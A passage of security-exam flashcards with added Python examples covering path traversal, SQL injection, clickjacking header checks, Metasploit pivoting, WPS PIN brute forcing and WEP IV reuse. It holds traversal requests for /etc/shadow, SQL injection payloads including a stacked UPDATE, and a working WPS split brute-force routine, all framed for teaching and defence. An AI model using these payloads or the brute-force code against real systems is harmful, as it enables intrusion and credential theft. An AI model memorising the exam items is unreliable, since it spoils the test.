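PROXY_LOG = [
    '10.0.0.12 - - [01/Mar/2021:10:02:11 -0500] "GET http://test.diontraining.com/../../../../etc/shadow HTTP/1.1" 403 0',
    '10.0.0.12 - - [01/Mar/2021:10:02:19 -0500] "GET http://test.diontraining.com/images/logo.png HTTP/1.1" 200 5120',
    '10.0.0.12 - - [01/Mar/2021:10:02:25 -0500] "GET http://test.diontraining.com/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 200 1333',
]

if __name__ == "__main__":
    for url in traversal_attempts(PROXY_LOG):
        print("traversal attempt:", url, "->", resolve_under_root(WEBROOT, urlsplit(url).path))
```

The double-encoded third line is why the decoder runs twice: a single unquote leaves %2e%2e in place, and a naive check for the literal string “../” would miss it.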

23
Q

You are conducting a penetration test against the Dion Training test server. You have just run nikto against the server and received the results below:

-=-=-=-=-=-
root@DionTraining:~# nikto -h test.diontraining.com
- Nikto v2.1.6
—————————————————————————
+ Target IP: 164.201.54.34
+ Target Hostname: test.diontraining.com
+ Target Port: 80
+ Start Time: 2020-12-22 13:43:13 (GMT-5)
—————————————————————————
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x2c39 0x53a938fc104ed
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header ‘x-ob_mode’ found, with contents: 1
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 7596 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2016-08-22 06:54:44 (GMT8) (1291 seconds)
—————————————————————————
+ 1 host(s) tested
-=-=-=-=-=-

Based on the results above, which of the following exploits should you develop for this engagement?

A. Arbitrary code execution

B. SQL injection

C. Clickjacking

D. Privilege escalation

A

C. Clickjacking

Explanation
OBJ-5.2: The X-Frame-Options response header tells a browser whether the page may be rendered inside a frame or iframe. Because it is absent, an attacker can load the site in an invisible frame on a page they control and trick users into clicking on it, which is a clickjacking attack, so that is the exploit these results support. Nothing in the output indicates SQL injection, arbitrary code execution, or privilege escalation: Apache 2.4.18 and the exposed /phpmyadmin/ directory are worth further testing, but Nikto has only reported their presence, not a vulnerability. The remaining findings (directory indexing under /manual/, the default Apache files, inode-leaking ETags, and the missing X-Content-Type-Options header) are information disclosures and hardening gaps rather than exploits to develop. Before reporting the clickjacking finding, check whether the site sets Content-Security-Policy with a frame-ancestors directive; it is the modern replacement for X-Frame-Options, and the Nikto check shown only looks for the older header.
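The Python below (an added example, not from the card or from Nikto) parses a raw HTTP response and reports the two header findings from this scan, treating a Content-Security-Policy frame-ancestors directive as valid anti-clickjacking protection so that a site using only the modern header is not reported as vulnerable. The three sample responses are constructed; the first reuses the Server and ETag values from the scan output above.

```python
def parse_headers(raw_response):
    """Parse a raw HTTP response into {lower-case name: value}. Repeated
    headers are joined with ', ', which is how HTTP defines them."""
    headers = {}
    for line in raw_response.split("\r\n")[1:]:  # skip the status line
        if line == "":
            break                                 # end of the header block
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        headers[name] = value if name not in headers else headers[name] + ", " + value
    return headers


def framing_protection(headers):
    """Return 'none', 'x-frame-options', 'csp' or 'both'. CSP frame-ancestors is
    the current standard and takes precedence over X-Frame-Options in browsers
    that support it; the obsolete ALLOW-FROM form is not counted as protection."""
    xfo = headers.get("x-frame-options", "").strip().upper()
    has_xfo = xfo in ("DENY", "SAMEORIGIN")
    directives = headers.get("content-security-policy", "").split(";")
    has_csp = any(d.strip().lower().startswith("frame-ancestors") for d in directives)
    if has_xfo and has_csp:
        return "both"
    if has_csp:
        return "csp"
    if has_xfo:
        return "x-frame-options"
    return "none"


def audit(raw_response):
    """The header findings from the scan above that a practitioner would keep."""
    headers = parse_headers(raw_response)
    findings = []
    if framing_protection(headers) == "none":
        findings.append("clickjacking: neither X-Frame-Options nor CSP frame-ancestors is set")
    if headers.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("MIME sniffing: X-Content-Type-Options: nosniff is not set")
    return findings


# Constructed responses (bodies omitted). The first mirrors the scanned server.
RAW_UNPROTECTED = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.18 (Ubuntu)\r\n"
    'ETag: "2c39-53a938fc104ed"\r\n'
    "x-ob_mode: 1\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)
RAW_LEGACY = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "\r\n"
)
RAW_MODERN = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Content-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for name, raw in (("unprotected", RAW_UNPROTECTED), ("legacy", RAW_LEGACY), ("modern", RAW_MODERN)):
        print(name, framing_protection(parse_headers(raw)), audit(raw))
```

The X-XSS-Protection header Nikto also mentions is deliberately not audited: modern browsers have removed the XSS auditor it controlled, and the current recommendation is to set it to 0 or omit it and rely on Content-Security-Policy instead.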

24
Q

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, http://test.diontraining.com/index.php?id=1%20OR%2017-7%3d10. What type of attack has likely occurred?

A. Session hijacking

B. SQL injection

C. Buffer overflow

D. XML injection

A

B. SQL injection

Explanation
OBJ-5.3: This is a Boolean-based SQL injection. It occurs when user input is interpreted as part of a SQL command rather than as data by the back-end database. URL-decoding the parameter gives id=1 OR 17-7=10. If the application concatenates that into a query such as SELECT … WHERE id=1 OR 17-7=10, the expression 17-7=10 is always true, so the WHERE clause is true for every row and the query returns all records instead of the one with id 1. The arithmetic is simply an obfuscated form of the classic OR 1=1 payload, written to slip past filters that look for the literal string 1=1. Whether the database returns extra data, an error, or a different page lets the attacker confirm the injection point and then extract data one true/false question at a time. A buffer overflow writes past the end of a buffer into adjacent memory. A session hijacking attack exploits the web session control mechanism, normally a session token. XML injection manipulates or compromises the logic of an XML application or service.

25
Q

A cybersecurity analyst working at a major university is reviewing the SQL server log of completed transactions and notices the following entry:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
“select ID, GRADE from GRADES where ID=1235235; UPDATE GRADES set GRADE=’A’ where ID=1235235;”
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on this transaction log, which of the following most likely occurred?

A. The application and the SQL database are functioning properly

B. A student with ID #1235235 used an SQL injection to give themselves straight A’s

C. Someone used an SQL injection to assign straight A’s to the student with ID #1235235

D. The SQL server has insufficient logging and monitoring

A

C. Someone used an SQL injection to assign straight A’s to the student with ID #1235235

Explanation
OBJ-5.3: Based on this transaction log entry, it appears that the ID field was not properly validated before being passed to the SQL server. The semicolon lets the attacker append a second statement (a stacked query), so a single request both retrieved the student's grades and set every one of that student's grades to an 'A'. Analysts commonly look for a "1=1"-style condition to identify SQL injection, but there are many other ways to conduct one: if input validation is not being performed on user-entered data, an attacker can use any part of the SQL language and inject SQL-specific commands. This entry is suspicious and indicates that the application is not functioning properly (it is not validating input). Still, there appears to be adequate logging and monitoring based on what we can see, and the question never indicates that logging was an issue. No legitimate application function would set ALL of a particular student's grades to A's in one transaction, which is what makes this single entry stand out. Most SQL statements in a SQL log are fairly uniform and repetitive by nature when you review them. This leaves the question of who performed this SQL injection. Per the question choices, it could be the student with ID# 1235235 or "someone." While student #1235235 had the most to gain, without further investigation we cannot prove that it actually was student #1235235 who performed the SQL injection. Undoubtedly, student #1235235 should be a person of interest in any ensuing investigation, but additional information (i.e., whose credentials were being used, source IP, etc.) should be gathered before making any accusations. Therefore, the answer is that "someone" performed this SQL injection.
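The two injections in cards 24 and 25, worked through in code. This is an added example, not part of the original flashcards: the GRADES table and its rows are constructed sample data, and the run_untrusted_sql helper is a stand-in for a backend driver that accepts stacked (semicolon-separated) statements, as MSSQL does. It decodes the proxy-log URL from card 24, flags it, runs both payloads against a vulnerable string-concatenated query, and shows the hardened version (allow-list validation plus a bound parameter) rejecting them.

```python
import re
import sqlite3
import urllib.parse

# Constructed sample data (not from the cards): a small GRADES table.
SAMPLE_GRADES = [
    (1235235, "MATH101", "C"),
    (1235235, "HIST200", "D"),
    (4488122, "MATH101", "B"),
]

# The URL from the proxy log in card 24.
LOGGED_URL = "http://test.diontraining.com/index.php?id=1%20OR%2017-7%3d10"

# Crude proxy-log detector: SQL keywords or metacharacters inside a parameter
# that should only ever hold a number. Tune the pattern for your own application.
SQLI_HINT = re.compile(r"(\bor\b|\band\b|\bunion\b|\bselect\b|;|--|')", re.I)


def make_db():
    """In-memory SQLite database seeded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE GRADES (ID INTEGER, COURSE TEXT, GRADE TEXT)")
    conn.executemany("INSERT INTO GRADES VALUES (?, ?, ?)", SAMPLE_GRADES)
    conn.commit()
    return conn


def decode_id_param(url):
    """Percent-decode the id= parameter the way the web server does before it
    builds its query: %20 becomes a space, %3d becomes '='."""
    query = urllib.parse.urlparse(url).query
    return urllib.parse.parse_qs(query)["id"][0]


def looks_like_sqli(param_value):
    """True when a decoded parameter value contains SQL syntax."""
    return SQLI_HINT.search(param_value) is not None


def run_untrusted_sql(conn, sql):
    """Execute every ';'-separated statement, as a backend that permits stacked
    queries would, and return the rows of the first one. Splitting on ';' is
    naive (a ';' inside a string literal would break it) but enough for the demo."""
    rows = None
    for stmt in (s.strip() for s in sql.split(";")):
        if not stmt:
            continue
        cur = conn.execute(stmt)
        if rows is None:
            rows = cur.fetchall()
    conn.commit()
    return rows


def vulnerable_lookup(conn, user_id):
    """VULNERABLE: the untrusted value is concatenated into the SQL text, so
    '1 OR 17-7=10' or '1235235; UPDATE ...' is parsed as SQL, not as data."""
    sql = "SELECT ID, COURSE, GRADE FROM GRADES WHERE ID=" + user_id + ";"
    return run_untrusted_sql(conn, sql)


def safe_lookup(conn, user_id):
    """HARDENED: allow-list validation (digits only) plus a bound parameter, so
    the database never parses the value as SQL. Raises on anything else."""
    if not user_id.isdigit():
        raise ValueError("id must be a positive integer: %r" % user_id)
    cur = conn.execute(
        "SELECT ID, COURSE, GRADE FROM GRADES WHERE ID=?", (int(user_id),)
    )
    return cur.fetchall()


def grades_for(conn, student_id):
    """Current grade letters for one student, in insertion order."""
    cur = conn.execute(
        "SELECT GRADE FROM GRADES WHERE ID=? ORDER BY ROWID", (student_id,)
    )
    return [g for (g,) in cur.fetchall()]


if __name__ == "__main__":
    # Card 24: the logged URL decodes to a condition that is true for every row.
    injected = decode_id_param(LOGGED_URL)
    print("decoded id:", injected, "| suspicious:", looks_like_sqli(injected))
    conn = make_db()
    print("rows leaked:", len(vulnerable_lookup(conn, injected)))  # whole table

    # Card 25: a stacked statement both reads and rewrites the student's grades.
    stacked = "1235235; UPDATE GRADES SET GRADE='A' WHERE ID=1235235"
    vulnerable_lookup(conn, stacked)
    print("grades after stacked query:", grades_for(conn, 1235235))

    # The hardened lookup refuses both payloads before they reach the database.
    for payload in (injected, stacked):
        try:
            safe_lookup(conn, payload)
        except ValueError as err:
            print("rejected:", err)
```

The hardened lookup does two independent things: the isdigit() check is the input validation from card 28, and the ? placeholder makes the value a bound parameter, so even a value that slipped past validation could not change the statement's structure.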

26
Q

During a vulnerability scan, you notice that the hostname www.diontraining.com is resolving to www.diontraining.com.akamized.net instead. Based on this information, which of the following do you suspect is true?

A. The server assumes you are conducting a DDoS attack

B. You are scanning a CDN-hosted copy of the site

C. The scan will not produce any useful information

D. Nothing can be determined about this site with the information provided

A

B. You are scanning a CDN-hosted copy of the site

Explanation
OBJ-5.1: This result is due to the company using a distributed server model that hosts content on edge servers worldwide as part of a CDN. A content delivery network (CDN) is a geographically distributed network of proxy servers and their data centers that provides high availability and performance by serving content from locations close to end-users. The requested content may be served from the edge server's cache or pulled from the main diontraining.com servers. If you are scanning a web server or application hosted behind a CDN, be aware that you might be scanning an edge copy of the site and will not get accurate results about the origin server. While an edge server usually serves only static content, it is still useful to determine whether any vulnerabilities exist in that portion of the site. Distributed denial-of-service (DDoS) attacks range from small and sophisticated to large and bandwidth-busting, and Akamai does provide strong DDoS protection, but nothing in this question indicates that the server is attempting to stop your scans or has decided you are conducting a DDoS attack against it.

27
Q

A penetration tester has exploited an FTP server using Metasploit and now wants to pivot to the organization’s LAN. What is the best method for the penetration tester to use to conduct the pivot?

A. Issue the pivot exploit and setup meterpreter

B. Reconfigure the network settings in meterpreter

C. Set the payload to propagate through meterpreter

D. Create a route statement in meterpreter

A

D. Create a route statement in meterpreter

Explanation

OBJ-5.1: The FTP server was exploited from outside the LAN, so the tester's machine has no path to the internal subnet. Adding a route that sends traffic for that subnet through the existing Meterpreter session lets later Metasploit modules reach the LAN through the compromised FTP server. Metasploit makes this simple: from the Meterpreter session, run autoroute -s <internal subnet> (or, from msfconsole, route add <subnet> <netmask> <session id>) creates the route, and the post/multi/manage/autoroute module can discover the subnets the compromised host can see and add the routes needed.

28
Q

What control provides the best protection against both SQL injection and cross-site scripting attacks?

A. Hypervisors

B. Network layer firewalls

C. CSRF

D. Input validation

A

D. Input validation

Explanation

OBJ-5.3: Input validation rejects data that does not match what the application expects (type, length, format, allowed characters) before it is used, which removes the malformed input both SQL injection and cross-site scripting rely on, making it a strong control against both. A network layer firewall is a device designed to prevent unauthorized access to a network: it blocks unauthorized communications and only permits traffic based on IP addresses, ports, and protocols, so it cannot see or judge the content of an otherwise legitimate HTTP request. Cross-site request forgery (CSRF) is another attack type, not a control. A hypervisor controls access between virtual machines.

29
Q

What common technique is used by malicious individuals to perform a man-in-the-middle attack on a wireless network?

A. ARP cache poisoning

B. Amplified DNS attacks

C. Session hijacking

D. Creating an evil twin

A

D. Creating an evil twin

Explanation:

OBJ-6.1: Evil twin access points are the most common way to perform a man-in-the-middle attack on a wireless network. An evil twin is a rogue access point that advertises the same SSID as a legitimate one so that clients connect to it instead; it is the wireless LAN equivalent of a phishing scam. The attacker can then read or modify the victims' traffic, steal passwords by monitoring their connections, or redirect them to a fraudulent web site to phish their credentials.

30
Q

You are working as part of a penetration testing team targeting Dion Training’s wireless network. Which of the following tools should you use to gather information about their wireless network?

A. Whois

B. Burp suite

C. BeEF

D. Kismet

A

D. Kismet

Explanation

OBJ-6.1: Kismet is an 802.11 Layer 2 wireless network detector, sniffer, and intrusion detection system included with Kali Linux. It can monitor wireless activity, identify device types, and capture raw packets for later password cracking. Whois is a protocol that queries databases that store the registered users or assignees of an Internet resource, such as a domain name. Burp Suite is an integrated platform for testing the security of web applications; it acts as a local proxy so that the attacker can capture, analyze, and manipulate HTTP traffic. BeEF (Browser Exploitation Framework) is a penetration testing tool included with Kali Linux that focuses on web browsers and can be used for XSS and injection attacks against a website.

31
Q

What is the term for exploiting a weakness in a user’s wireless headset to compromise their smartphone?

A. Multiplexing

B. Zero-day attack

C. Smurfing

D. Bluejacking

A

D. Bluejacking

Explanation
OBJ-6.1: Bluejacking sends unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones, PDAs, or laptop computers. Strictly, bluejacking only delivers messages; the related terms bluesnarfing (stealing data over Bluetooth) and bluebugging (taking control of a device over Bluetooth) describe the more intrusive attacks, so be aware of all three for the exam.

32
Q

Which of the following weaknesses exist in WPS enabled wireless networks?

A. Utilizes TKIP to secure the authentication handshake

B. Utilizes a 24-bit initialization vector

C. Brute force occurs within 11,000 combinations

D. Utilizes a 40-bit encryption key

A

C. Brute force occurs within 11,000 combinations

Explanation
OBJ-6.1: The most prominent attack against WPS-enabled wireless networks is brute-forcing the 8-digit PIN that a client uses to enroll a device without knowing the pre-shared key. WPS verifies each half of the PIN separately: the access point reveals whether the first four digits are correct before the second half is ever checked. The first half therefore takes at most 10,000 guesses, and because the eighth digit is a checksum of the other seven, the second half takes at most 1,000, for a total of 11,000 combinations instead of 100,000,000. This takes only a few minutes to hours on most modern computers, as long as the WAP does not lock WPS after a certain number of failures. Where a lockout is triggered by the client's MAC address, you can often spoof your MAC address to bypass this defense.

33
Q

A cybersecurity analyst notices that an attacker is trying to crack the WPS pin associated with a wireless printer. The device logs show that the attacker tried 00000000, 00000001, 00000002 and continued to increment by 1 number each time until they found the correct PIN of 13252342. Which of the following type of password cracking was being performed by the attacker?

A. Rainbow table

B. Dictionary

C. Hybrid

D. Brute-force

A

D. Brute-force

Explanation
OBJ-6.1: A brute-force attack tries every possible value in the keyspace until the right one is found; here the attacker walked the PIN space sequentially from 00000000 upward. The larger the keyspace, the longer the attack takes, but given enough time it always succeeds. A dictionary attack uses a predefined list of likely values, a hybrid attack mutates dictionary entries (appending digits, substituting characters), and a rainbow table looks up precomputed hashes rather than guessing online.
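The arithmetic behind cards 32 and 33, as an added example that is not part of the original flashcards. The WPS checksum rule (weights 3,1,3,1,3,1,3 over the first seven digits) is the one from the WPS specification and implemented by Reaver; the PIN 13252342 from card 33 passes it. The SimulatedRegistrar class is a stand-in for an access point, not real WPS traffic: it answers like an AP's M4/M6 messages do, failing on the first half before it ever looks at the second, with an optional lockout. The code compares the naive sequential count from card 33 with the half-by-half attack from card 32.

```python
def wps_checksum(first_seven):
    """Checksum digit of a WPS PIN: weights 3,1,3,1,3,1,3 over the first seven
    digits, then (10 - sum mod 10) mod 10. Same rule Reaver implements."""
    total = sum((3 if pos % 2 == 0 else 1) * int(d)
                for pos, d in enumerate(first_seven))
    return (10 - total % 10) % 10


def is_valid_pin(pin):
    """True for an 8-digit PIN whose last digit is the correct checksum."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])


def keyspace():
    """Worst-case guesses: every 8-digit string, every checksum-valid PIN, and
    the split attack (first half plus second half), which is the 11,000."""
    return {
        "all_8_digit": 10 ** 8,
        "checksum_valid": 10 ** 7,
        "split_attack": 10 ** 4 + 10 ** 3,
    }


class SimulatedRegistrar:
    """Stand-in for the access point's WPS registrar (simulation, not a real AP).
    A real AP leaks the same two facts: it NACKs M4 when the first half is
    wrong and NACKs M6 when the second half is wrong."""

    def __init__(self, pin, lockout_after=None):
        self.pin = pin
        self.lockout_after = lockout_after  # failures before the AP locks WPS
        self.attempts = 0
        self.failures = 0
        self.locked = False

    def try_pin(self, candidate):
        if self.locked:
            return "LOCKED"
        self.attempts += 1
        if candidate[:4] != self.pin[:4]:
            reply = "M4_NACK"
        elif candidate[4:] != self.pin[4:]:
            reply = "M6_NACK"
        else:
            reply = "OK"
        if reply != "OK":
            self.failures += 1
            if self.lockout_after is not None and self.failures >= self.lockout_after:
                self.locked = True
        return reply


def split_brute_force(registrar):
    """Reaver-style attack: learn the first half from M4 NACKs (at most 10,000
    tries), then the second half as 3 digits plus a checksum we compute ourselves
    (at most 1,000 tries). Assumes the AP's PIN has a valid checksum, which
    13252342 does. Returns (pin_or_None, attempts_used)."""
    first_half = None
    for i in range(10 ** 4):
        reply = registrar.try_pin("%04d0000" % i)
        if reply == "LOCKED":
            return None, registrar.attempts
        if reply != "M4_NACK":
            first_half = "%04d" % i
            break
    if first_half is None:
        return None, registrar.attempts
    for j in range(10 ** 3):
        pin7 = first_half + "%03d" % j
        candidate = pin7 + str(wps_checksum(pin7))
        reply = registrar.try_pin(candidate)
        if reply == "LOCKED":
            return None, registrar.attempts
        if reply == "OK":
            return candidate, registrar.attempts
    return None, registrar.attempts


def naive_sequential_attempts(pin):
    """Card 33's attacker counted 00000000, 00000001, ... up to the PIN."""
    return int(pin) + 1


if __name__ == "__main__":
    pin = "13252342"
    print("checksum valid:", is_valid_pin(pin), keyspace())
    print("naive sequential guesses:", naive_sequential_attempts(pin))
    print("split attack:", split_brute_force(SimulatedRegistrar(pin)))
    print("with lockout after 10 failures:",
          split_brute_force(SimulatedRegistrar(pin, lockout_after=10)))
```

For the card's PIN the split attack needs 1,326 guesses for the first half (0000 through 1325) and 235 for the second (000 through 234 plus the computed checksum), 1,561 in total, against 13,252,343 for the sequential sweep the device logs showed. A defender reading those logs should note that the sequential pattern is the less capable attacker; the lockout is what stops both.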

34
Q

You are working as a network administrator for Dion Training. The company has decided to allow employees to connect their devices to the corporate wireless network under a new BYOD policy. You have been asked to separate the corporate network into an administrative network (for corporate-owned devices) and an untrusted network (for employee-owned devices). Which of the following technologies should you implement to achieve this goal?

A. VPN

B. VLAN

C. WPA2

D. MAC filtering

A

B. VLAN

Explanation
OBJ-6.1: A virtual local area network (VLAN) is a type of network segmentation configured in your network switches that prevents communication between different VLANs unless a router (or Layer 3 switch) is placed between them. This allows two virtually separated networks to exist on one physical network and keeps the two virtual networks' traffic apart; on the wireless side, each SSID is mapped to its own VLAN. A virtual private network (VPN) is a remote access capability that connects a trusted device over an untrusted network back to the corporate network and would not create the desired effect. WPA2 is a type of wireless encryption, but it will not create two different segmented networks on the same physical hardware. MAC filtering is used to allow or deny a device from connecting to a network, but it will not create two network segments, as desired.

35
Q

What tool is used to collect wireless packet data?

A. Aircrack-ng

B. John the Ripper

C. Nessus

D. Netcat

A

A. Aircrack-ng

Explanation
OBJ-6.1: Aircrack-ng is a complete suite of wireless security assessment and exploitation tools that includes monitoring, attacking, testing, and cracking of wireless networks. Its airodump-ng component captures 802.11 packets and exports the data collected as a text file or pcap file. John the Ripper is a password cracking tool. Nessus is a vulnerability scanner. Netcat is a general-purpose tool for reading and writing TCP and UDP connections, often used to create a reverse shell from a victimized machine back to an attacker.

36
Q

Which of the following is the LEAST secure wireless security and encryption protocol?

A. AES

B. WPA

C. WPA2

D. WEP

A

D. WEP

Explanation

OBJ-6.1: Wired Equivalent Privacy (WEP) is the security protocol specified in the original IEEE 802.11 wireless LAN standard, designed to give a WLAN a level of security and privacy comparable to what is usually expected of a wired LAN. It is the oldest and the weakest form of wireless security. WEP uses RC4 with a 40- or 104-bit key combined with a 24-bit initialization vector that is sent in cleartext with every frame; the small IV space guarantees keystream reuse on a busy network, and statistical attacks on the captured IVs (the FMS and PTW attacks implemented in aircrack-ng) recover the key from a few tens of thousands of frames in minutes on a normal end-user computer. This is not brute force of the key; it is a structural flaw in the protocol that no longer key length can fix.
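The IV-reuse weakness in the explanation above, demonstrated in code. This is an added example, not part of the original flashcards: it contains a textbook RC4 implementation, a model of WEP framing (per-packet key = IV || secret key, IV sent in the clear; the CRC-32 ICV that real WEP appends is left out because it does not affect the keystream), and constructed sample frames. With two frames under the same IV, the XOR of the ciphertexts equals the XOR of the plaintexts, so one predictable frame (an ARP or LLC/SNAP header) exposes the other without the key. The birthday-bound function estimates how quickly random 24-bit IVs start to repeat.

```python
import math

IV_BYTES = 3  # WEP prepends a 24-bit cleartext IV to every frame


def rc4_keystream(key, length):
    """RC4 key scheduling plus keystream generation (the cipher WEP uses)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a, b):
    """Bytewise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret_key, iv, plaintext):
    """Model of WEP framing: per-packet RC4 key is IV || secret key, and the
    3-byte IV travels in cleartext in front of the ciphertext. The CRC-32 ICV of
    real WEP is omitted; it changes nothing about the keystream reuse."""
    if len(iv) != IV_BYTES:
        raise ValueError("WEP IV must be 3 bytes")
    keystream = rc4_keystream(iv + secret_key, len(plaintext))
    return iv + xor_bytes(plaintext, keystream)


def frame_iv(frame):
    return frame[:IV_BYTES]


def recover_with_known_plaintext(frame_a, plaintext_a, frame_b):
    """Two frames with the same IV share a keystream, so C_a XOR C_b equals
    P_a XOR P_b. Knowing P_a yields the keystream and therefore P_b (as many
    bytes as P_a is long) without the secret key. Returns None if the IVs differ."""
    if frame_iv(frame_a) != frame_iv(frame_b):
        return None
    keystream = xor_bytes(frame_a[IV_BYTES:], plaintext_a)
    return xor_bytes(frame_b[IV_BYTES:], keystream)


def expected_frames_until_iv_repeat():
    """Birthday bound for randomly chosen 24-bit IVs: about sqrt(pi * N / 2)
    frames before the first collision, roughly 5,100 frames."""
    return math.sqrt(math.pi * 2 ** (8 * IV_BYTES) / 2)


if __name__ == "__main__":
    secret = b"\x01\x02\x03\x04\x05"  # constructed 40-bit WEP key
    iv = b"\x00\x00\x2a"              # constructed IV, reused by both frames
    arp = b"ARP who-has 10.0.0.1 tell 10.0.0.7"   # predictable plaintext
    login = b"GET /login?user=alice&pw=hunter2"   # the frame we want to read
    frame_1 = wep_encrypt(secret, iv, arp)
    frame_2 = wep_encrypt(secret, iv, login)
    print("C1^C2 == P1^P2:", xor_bytes(frame_1[3:], frame_2[3:]) == xor_bytes(arp, login))
    print("recovered:", recover_with_known_plaintext(frame_1, arp, frame_2))
    print("frames until an IV repeats (random IVs): %.0f" % expected_frames_until_iv_repeat())
```

Real attacks do not even need a known plaintext: the FMS and PTW attacks exploit statistical biases in RC4's first output bytes across many IVs to recover the secret key itself, which is why capturing IVs is the goal of aireplay-ng's traffic-injection attacks.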

36
Q

What technique is most effective in determining whether or not increasing end-user security training would benefit the organization during your technical assessment of their network?

A. Vulnerability scanning

B. Social engineering

C. Application security testing

D. Network sniffing

A

B. Social engineering

Explanation

OBJ-4.2: Social engineering refers to the psychological manipulation of people into performing actions or divulging confidential information. During your technical assessment, using social engineering techniques such as a simulated phishing campaign or pretexting phone calls measures how employees actually respond, which tells you whether additional end-user security training would benefit the organization. The other three options focus solely on technical controls; therefore, adding end-user training would not change their results.

37
Q

You are working as part of a penetration testing team targeting Dion Training’s mobile device software. Which of the following tools would NOT be helpful while trying to exploit their mobile applications?

A. Androzer

B. Dirbuster

C. APKX

D. APK studio

A

B. Dirbuster

Explanation

OBJ-7.1: DirBuster is a brute-force tool included with Kali Linux that discovers hidden directories and file names on web and application servers, so it targets the web tier rather than a mobile app. Androzer is a security testing framework for Android apps and devices. APKX is a Python wrapper for dex converters and Java decompilers included in the OWASP Mobile Security Testing Guide. APK Studio is a cross-platform IDE for reverse engineering Android applications.

38
Q

You are troubleshooting a user’s workstation that is operating extremely slowly. You open the Task Manager and see that only Microsoft Word is currently running, but the CPU and network utilization is consistently running between 95-100%. Which of the following is MOST likely causing this issue?

A. The computer is the victim of a DoS attack

B. The network’s firewall is blocking outbound traffic

C. The computer has become a zombie

D. The application is not compatible with this OS

A

C. The computer has become a zombie

Explanation
OBJ-4.3: The workstation has most likely become a zombie. A zombie is any workstation running unauthorized software that directs the device to participate in a DDoS attack as part of a larger botnet. A botnet is a network of computers that have been compromised by a Trojan, rootkit, or worm malware. This workstation would then attempt to flood the victim’s computer with requests over the network. These requests would require CPU and network resources to make, causing the utilization to rise to 95-100% resource utilization.

39
Q

You are working as a server administrator at Dion Training. You unlock the server room door using your proximity badge and walk through the door. Before the door shuts, another person walks in behind you. What social engineering technique did this person utilize?

A. Impersonation

B. Spoofing

C. Tailgating

D. Shoulder surfing

A

C. Tailgating

Explanation
OBJ-4.2: Tailgating (or piggybacking) is a means of entering a secure area without authorization by following close behind the person that has been allowed to open the door or checkpoint. This might be done without the target’s knowledge or might be a means for an insider to allow access to someone without recording it in the building’s entry log. Another technique is to persuade someone to hold a door open for them.